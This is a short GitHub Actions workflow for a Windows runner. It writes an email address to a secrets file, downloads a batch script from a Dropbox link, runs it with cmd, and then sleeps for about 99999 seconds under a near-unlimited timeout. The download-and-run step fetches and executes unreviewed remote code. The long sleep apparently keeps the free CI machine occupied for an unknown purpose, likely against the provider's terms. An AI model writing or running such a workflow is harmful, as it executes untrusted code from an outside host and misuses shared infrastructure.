name: Windows

on:
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 99999

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=ainxd@hldrive.com" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/54bctt61pbtnf954zrq8m/down.bat?rlkey=94snmqeqmyf6zw6fds5956rd2&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: Start-sleep -Seconds 99999
